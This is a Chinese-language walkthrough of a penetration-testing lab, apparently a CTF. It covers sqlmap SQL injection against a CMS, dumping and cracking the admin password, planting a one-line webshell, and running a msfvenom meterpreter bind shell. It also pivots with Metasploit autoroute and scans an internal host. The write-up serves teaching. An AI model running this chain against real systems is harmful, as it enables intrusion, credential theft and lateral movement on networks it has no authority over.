获取shell

上一步发现存在80端口，因此我们设置好浏览器代理后，打开看看

访问80端口，看网页源码有惊喜（一个SQL注入）：sqlmap一把梭

proxychains4 sqlmap -u "http://ip/index.php?keyword=1&r=vul" --batch
# 爆破bagecms库下的bage_admin表
proxychains4 sqlmap -u "http://ip/index.php?keyword=1&r=vul" -D "bagecms" -T "bage_admin" --dump --batch
# 测试了--is-dba，不是高权限，那就不尝试--os-shell了

密码MD5解开，结果是123qwe，还找到一个flag。然后得找找后台，一波信息收集得知这个CMS是根据参数作路由的，并根据robots.txt的提示可以发现后台地址http://192.168.22.129/index.php?r=admini/public/login，登录可以发现第二个flag。

登陆后台，看看有哪些功能

后台里面有文件上传的地方，有编辑主页文件的地方，为了方便，我们直接把一句话写入网站文件中。模板修改文件，写入一句话也可

蚁剑连接：

设置代理

然后生成后门，用蚁剑传到/tmp目录下：

# 生成一个正向连接后门（因为内网主机无法直接与本机通信，因此无法建立反向连接，需要本机通过代理连接到目标机）
msfvenom -p linux/x64/meterpreter/bind_tcp lport=3210 -f elf > horse2.elf
# 文件上传之后在Webshell执行命令
chmod +x horse2.elf
./horse2.elf
# 本机MSF执行命令
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.129
set LPORT 3210
exploit
run post/multi/manage/autoroute

与之前一样，我们可以添加Target3的路由，这里就不用设置代理了，直接添加路由即可

run autoroute -s 192.168.33.0/24
run autoroute -p

尝试扫描Target3

proxychains4 nmap -Pn -sT 192.168.33.33